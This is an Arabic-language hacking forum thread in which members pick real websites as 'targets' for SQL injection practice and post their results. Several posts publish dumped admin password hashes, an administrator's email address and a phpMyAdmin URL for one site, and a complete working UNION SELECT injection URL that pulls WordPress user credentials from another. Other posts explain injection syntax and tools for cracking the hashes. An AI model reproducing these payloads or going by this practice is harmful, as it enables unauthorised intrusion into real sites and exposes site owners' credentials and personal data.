التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-05-2010, 11:17 PM   رقم المشاركة : 166 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


[align=center]الهدف الجديد : http://www.touringcartimes.com/news.php?id=4311
هذا اعتقد راح يكون ممل شوي لذلك راح اضيف هدف ثاني معاه للي ما قدر يحقن الاول يحقن الثاني
الهدف الثاني : http://www.vfs.com/news.php?id=7&news_id=362
بالتوفيق
تحياتي


[/align]

التوقيع

^_^



 

   

قديم 08-05-2010, 11:19 PM   رقم المشاركة : 167 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


عبد الله ر
يعطيك الصحة أخي العزيز
جاري تقييمك على العمل اللذي تقوم به

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-05-2010, 11:20 PM   رقم المشاركة : 168 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


Master vbspiders
جاري بعد العودة في الليل بإذن الله

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 12:17 AM   رقم المشاركة : 169 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-06-2010, 02:15 AM   رقم المشاركة : 170 (permalink)
معلومات العضو
 
الصورة الرمزية m0h@med
 

 

 
إحصائية العضو







m0h@med غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
m0h@med is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo
d4rK-h4ck3r
أحي العزيز ما فائدة هذا الأمر
كود:
concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)
هنا لماذا كتبت الرمز 0x3a3a3 مطول
+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة
كود:
concat_ws(0x3a,id,user,parola)
وشكرا مقدما

السلام عليكم أخي darkman
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا
exemple
concat(id,0x3a,passs)
resultat
admin:admin
mais si vous ajoutez 0x3a3a
concat(id,0x3a3a,passs)
resultat
admin::admin

بخصوص الاستعلام
concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية
c'est t-a dire
concat_ws(0x3a,id,user,parola)
هي نفسها
concat(id,0x3a,user,0x3a,parola)

الى الأمام دائما....^_^
التوقيع

[align=center]smilies14 .... VbSp!De$.c0m[/align]

 

   

قديم 08-06-2010, 03:58 PM   رقم المشاركة : 171 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Syst3m-32
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]


[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن...
+
بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة
تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة
تحياتي

[/align]
التوقيع

^_^



 

   

قديم 08-06-2010, 04:11 PM   رقم المشاركة : 172 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 

 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road

افتراضي


هذا أجمل شئ سمعته هذا اليوم.

التوقيع

 

   

قديم 08-06-2010, 05:16 PM   رقم المشاركة : 173 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


m0h@med شكرا أخي m0h@med على التوضيح
و الله أفدتني بخصوص concat_ws كثيرا
وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:19 PM   رقم المشاركة : 174 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Syst3m-32
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

هل حقنت الموقع الأول ب havij أخي system-32
التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:21 PM   رقم المشاركة : 175 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


الهدف الجديد


كود:
www.imagesfestival.com
التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:30 PM   رقم المشاركة : 176 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
smilies12
:a04:




التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:56 PM   رقم المشاركة : 177 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo
الهدف الجديد


كود:
www.imagesfestival.com


أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟

لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى

إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه

ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL

لكن لما نكون حقناه نعطيه الحل و يستفيد
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 


التعديل الأخير تم بواسطة TIKTAKram ; 08-06-2010 الساعة 05:59 PM.

   

قديم 08-06-2010, 06:22 PM   رقم المشاركة : 178 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


حقنتو يا غالي Syst3m-32
ويدويا

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 07:10 PM   رقم المشاركة : 179 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


اقتباس
تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر

:a04:

مشكور اخي العزيز ooooo_darkman_ooooo
ولو هذا واجبنا
بالنسبة للموقع : www.imagesfestival.com
والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه
بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول
مشكور على التقييم

بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور
التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

قديم 08-06-2010, 07:17 PM   رقم المشاركة : 180 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


يا دارك ليش ما قلت لي أنه WordPress ؟؟؟

جعلتني أظهر كأنني لم أستطع حقن الموقع

تم الحقن بنجاح بعد معرفة السكربت WordPress

إسم الجدول : wp_users

إسم عمود اليوزر : user_login

إسم عمود الباسوارد : user_pass

يوزر الأدمن : admin

باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1

بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress

و هذه الحقنة كاملة :

كود:
 http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users--
بالنسبة للوحة التحكم لو تتذكر يا دارك يا مشاكس كم حكينا عنها تظهر لك أني نسيت الموقع ؟؟ هههه

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

موضوع مغلق

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
العدد (3) من غرفة الحقن darkman.dz SQL قواعد البيانات 397 12-30-2010 01:23 PM
جهاز من غرفة جـنـسـيـة MasTer MiND Hackers Showoff 6 06-25-2009 04:01 PM


الساعة الآن 02:50 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0